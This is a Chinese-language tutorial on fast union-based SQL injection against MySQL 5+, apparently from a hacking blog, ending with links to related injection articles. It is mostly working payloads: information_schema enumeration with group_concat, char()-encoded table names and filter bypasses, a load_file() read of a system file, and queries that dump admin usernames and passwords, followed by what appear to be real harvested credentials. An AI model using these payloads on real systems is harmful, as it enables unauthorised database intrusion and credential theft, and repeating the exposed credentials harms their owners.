慢注入mysql Mysql注入高效率方法

此方法只適用於mysql 5.0以及5.0以上版本注入方法和mysql 5 類似

但此方法大大提高了讀取資料庫的速度,此方法並非本人原創，原創出處是國外某牛人

優點在於可以利用information_schema庫與group_concat的配合來達到一次性讀取出指定資料庫裡的內容,並且在limit被限制的情況下依然可以注入

缺點當乙個庫存在幾百甚至幾千個表和表字段和資料的時候讀取出資料的時間會相當的慢...

下面用簡單例項來演示原理不多說,相信經常玩注入的朋友都知道了.只挑重要部分例項演示

在注入時根據實際情況作出變化比如過濾了空格，使用/**/ , + 等等

union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17

讀出所有庫:

union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.schemata

讀出所有表:

union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()

讀出所有表字段:

union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.columns where table_schema=database() and table_name=char(97,100,109,105,110)

*/ (97,100,109,105,110)為admin的ascii碼依次類推

讀出所有表字段裡的內容:

union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin

select+1,concat_ws(char(32,58,32),user(),database(),version()),load_file(char(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23

select+1,concat_ws(char(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23

select+1,concat_ws(char(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.columns where table_schema=database()+and+table_name=char(97,100,109,105,110)%23

select+1,concat_ws(char(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23

webmaster:dzb521123,simlab:simadmin20043233

慢注入mysql Mysql注入高效率方法

繞安全狗mysql Mysql注入繞過安全狗

SQL注入報錯注入

DLL注入 APC注入

慢注入mysql Mysql注入高效率方法

繞安全狗mysql Mysql注入繞過安全狗

SQL注入 報錯注入

DLL注入 APC注入

相關推薦

SQL注入報錯注入